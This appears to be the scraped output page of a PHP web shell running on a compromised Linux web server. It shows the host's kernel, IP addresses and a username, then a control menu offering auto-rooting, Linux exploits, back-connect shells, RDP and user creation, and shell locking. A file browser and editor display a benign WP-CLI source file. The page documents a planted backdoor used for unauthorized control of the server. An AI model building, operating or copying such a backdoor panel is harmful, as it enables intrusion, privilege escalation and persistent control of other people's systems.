Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
php /
WP_CLI /
Dispatcher /
[ HOME SHELL ]
Name
Size
Permission
Action
CommandAddition.php
1.03
KB
-rw-r--r--
CommandFactory.php
8.67
KB
-rw-r--r--
CommandNamespace.php
1.17
KB
-rw-r--r--
CompositeCommand.php
7.28
KB
-rw-r--r--
RootCommand.php
843
B
-rw-r--r--
Subcommand.php
13.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CommandAddition.php
<?php namespace WP_CLI\Dispatcher; use WP_CLI; /** * Controls whether adding of a command should be completed or not. * * This is needed because we can't reliably pass scalar values by reference * through the hooks mechanism. An object is always passed by reference. * * @package WP_CLI */ final class CommandAddition { /** * Whether the command addition was aborted or not. * * @var bool */ private $abort = false; /** * Reason for which the addition was aborted. * * @var string */ private $reason = ''; /** * Abort the current command addition. * * @param string $reason Reason as to why the addition was aborted. */ public function abort( $reason = '' ) { $this->abort = true; $this->reason = (string) $reason; } /** * Check whether the command addition was aborted. * * @return bool */ public function was_aborted() { return $this->abort; } /** * Get the reason as to why the addition was aborted. * * @return string */ public function get_reason() { return $this->reason; } }
Close